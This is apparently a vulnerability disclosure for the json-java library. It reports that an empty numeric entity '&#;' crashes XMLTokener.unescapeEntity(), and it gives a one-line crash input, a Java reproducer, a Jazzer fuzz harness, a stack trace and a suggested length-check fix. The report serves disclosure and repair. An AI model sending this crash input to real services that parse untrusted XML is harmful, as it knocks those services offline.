Summary
XMLTokener.unescapeEntity() does not validate the length of numeric character references before accessing the second character. When processing empty entities like &#;, the code attempts to access e.charAt(1) on a string of length 1, causing StringIndexOutOfBoundsException and crashing applications that don't catch this unchecked exception.
Root Cause
The code accesses e.charAt(1) without checking string length:
Vulnerable Code (XMLTokener.java:162-164)
private String unescapeEntity(String e) {
if (e.charAt(0) == '#') {
if (e.charAt(1) == 'x' || e.charAt(1) == 'X') { // NO LENGTH CHECK!
cp = Integer.parseInt(e.substring(2), 16);
}
// ...
}
}
For input &#;, e = "#" (length 1), accessing e.charAt(1) throws exception.
PoC
Trigger file
Minimal input that triggers the vulnerability:
How to generate crash_input.bin
echo '<a>&#;</a>' > crash_input.bin
# crash_gen.py
with open("crash_input.bin", "w") as f:
f.write("<a>&#;</a>")
Trigger Method 1: Direct API Call (Library Usage)
import org.json.XML;
public class ReproduceXML {
public static void main(String[] args) {
// Minimal PoC - empty numeric entity
String poc = "<a>&#;</a>";
XML.toJSONObject(poc); // throws StringIndexOutOfBoundsException
}
}
Build and run:
javac -cp . ReproduceXML.java
java -cp . ReproduceXML
Output:
java.lang.StringIndexOutOfBoundsException: Index 1 out of bounds for length 1
at java.lang.String.charAt(String.java:1555)
at org.json.XMLTokener.unescapeEntity(XMLTokener.java:164)
at org.json.XMLTokener.nextEntity(XMLTokener.java:148)
at org.json.XML.toJSONObject(XML.java:784)
Trigger Method 2: Fuzzer (Jazzer)
// Copyright 2025 O2Lab
// SPDX-License-Identifier: Apache-2.0
import org.json.XML;
import org.json.JSONException;
import java.nio.charset.StandardCharsets;
public class XmlToJsonFuzzer {
public static void fuzzerTestOneInput(byte[] data) {
String input = new String(data, StandardCharsets.UTF_8);
try {
XML.toJSONObject(input);
} catch (JSONException e) {
// Expected parsing errors - ignore
}
// StringIndexOutOfBoundsException is NOT caught - will crash fuzzer
}
}
Build and run:
python3 infra/helper.py build_fuzzers --clean json-java
./XmlToJsonFuzzer corpus/
Impact
| Aspect |
Details |
| Type |
Denial of Service (DoS) |
| Severity |
Medium |
| Attack Vector |
Malformed XML entity &#; (empty numeric reference) |
| Affected Components |
XML.toJSONObject(), XMLTokener.unescapeEntity() |
| Affected Versions |
All versions up to 20251224 |
| CWE |
CWE-129 (Improper Validation of Array Index) |
Suggested Fix
Add length check before accessing second character:
private String unescapeEntity(String e) {
if (e.charAt(0) == '#') {
if (e.length() < 2) {
return ""; // or throw JSONException for invalid entity
}
if (e.charAt(1) == 'x' || e.charAt(1) == 'X') {
cp = Integer.parseInt(e.substring(2), 16);
} else {
cp = Integer.parseInt(e.substring(1));
}
// ...
}
}
Related to: #1036
Contribution: This potential vulnerability was found by AI-Based Vuln Detection system FuzzingBrain https://github.com/o2lab/afc-crs-all-you-need-is-a-fuzzing-brain.
Summary
XMLTokener.unescapeEntity()does not validate the length of numeric character references before accessing the second character. When processing empty entities like&#;, the code attempts to accesse.charAt(1)on a string of length 1, causingStringIndexOutOfBoundsExceptionand crashing applications that don't catch this unchecked exception.Root Cause
The code accesses
e.charAt(1)without checking string length:Vulnerable Code (XMLTokener.java:162-164)
For input
&#;,e= "#" (length 1), accessinge.charAt(1)throws exception.PoC
Trigger file
Minimal input that triggers the vulnerability:
How to generate crash_input.bin
Trigger Method 1: Direct API Call (Library Usage)
Build and run:
Output:
Trigger Method 2: Fuzzer (Jazzer)
Build and run:
Impact
&#;(empty numeric reference)XML.toJSONObject(),XMLTokener.unescapeEntity()Suggested Fix
Add length check before accessing second character:
Related to: #1036
Contribution: This potential vulnerability was found by AI-Based Vuln Detection system FuzzingBrain https://github.com/o2lab/afc-crs-all-you-need-is-a-fuzzing-brain.